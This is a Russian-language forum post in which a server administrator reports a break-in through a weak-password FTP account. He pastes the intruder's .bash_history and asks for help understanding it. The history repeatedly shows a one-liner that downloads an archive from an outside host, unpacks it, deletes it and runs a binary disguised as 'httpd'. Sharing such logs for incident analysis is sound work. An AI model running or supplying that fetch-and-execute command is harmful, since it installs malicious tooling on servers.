RedHat 2.6.18-194.el5
Сервер http, vsftpd, почта.
Пытался войти на FTP по авториз. доступу (vsftpd) - не пустил, не верный пароль.
Выставил учетке пароль заново, вошел на FTP и увидел файл .bash_history:
--------------
passwd
w
wget hackera.home.ro/FLood.tgz ; tar zxvf FLood.tgz ; rm -rf FLood.tgz ; cd mc-root ; chmod +x * ; PATH="." ; httpd
cd /var/tmp
wget hackera.home.ro/FLood.tgz ; tar zxvf FLood.tgz ; rm -rf FLood.tgz ; cd mc-root ; chmod +x * ; PATH="." ; httpd
cd
wget hackera.home.ro/FLood.tgz ; tar zxvf FLood.tgz ; rm -rf FLood.tgz ; cd mc-root ; chmod +x * ; PATH="." ; httpd
curl -O
ls -a
ps x
cd /var/tmp
wget
uptime
cd /tmp
ls -a
wget hackera.home.ro/FLood.tgz ; tar zxvf FLood.tgz ; rm -rf FLood.tgz ; cd mc-root ; chmod +x * ; PATH="." ; httpd
cd
ls -a
ls -a
cd mc-root
chmod +x *
PATH="."
httpd
cd
rm -rf mc-root
--------------
Пользователь принадлежит группе ftp, но оболочка была прописана /bin/bash (это упущение). Пароль был простой.
/etc/passwd остался не тронут.
Я плохо в этом разбираюсь. Скажите пожалуйста, что это было? Сам человек ломал или какой вирус? Я так понял, с ресурса был загружен архив и распакован.
И что за повторения «httpd»?
Скажите, мог ли хакер получить доступ к папкам, расположенным выше своей?
Стоит ли теперь переустанавливать? Образ есть.
Ответ на:
комментарий
от name_no
Ответ на:
комментарий
от Lee_Noox
Ответ на:
комментарий
от pupok
Ответ на:
комментарий
от gserg
Ответ на:
комментарий
от name_no
Ответ на:
комментарий
от pupok
Ответ на:
комментарий
от sdio
Ответ на:
комментарий
от gserg
Ответ на:
комментарий
от pupok
Ответ на:
комментарий
от pupok
Ответ на:
комментарий
от edigaryev
Ответ на:
комментарий
от sdio
Ответ на:
комментарий
от Valmont
Ответ на:
комментарий
от name_no
Ответ на:
комментарий
от name_no
Ответ на:
комментарий
от name_no
Ответ на:
комментарий
от Valmont
Ответ на:
комментарий
от Slon747
Ответ на:
комментарий
от edigaryev
Ответ на:
комментарий
от gserg
Ответ на:
комментарий
от guyvernk
Ответ на:
комментарий
от gserg
Ответ на:
комментарий
от name_no
Ответ на:
комментарий
от guyvernk
Ответ на:
комментарий
от Slon747
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
Похожие темы
- Форум мой лялих взломали :( (2008)
- Форум Сборка livecd в Gentoo (2014)
- Форум При передаче файлов на samba сервер - не сходится md5 сумма файла (2008)
- Форум Не могу настроить ProFTPD на CentOS (2015)
- Форум easy rtorrent+rutorrent (2011)
- Форум Руководство - Как запустить firecracker под CentOS 7. (2020)
- Форум российский ученый смог взломать пароль iPhone (2016)
- Форум Взломали? (2006)
- Форум Загрузка любого дистрибутива в RAM (2020)
- Форум Обновление SpamAssassin (2007)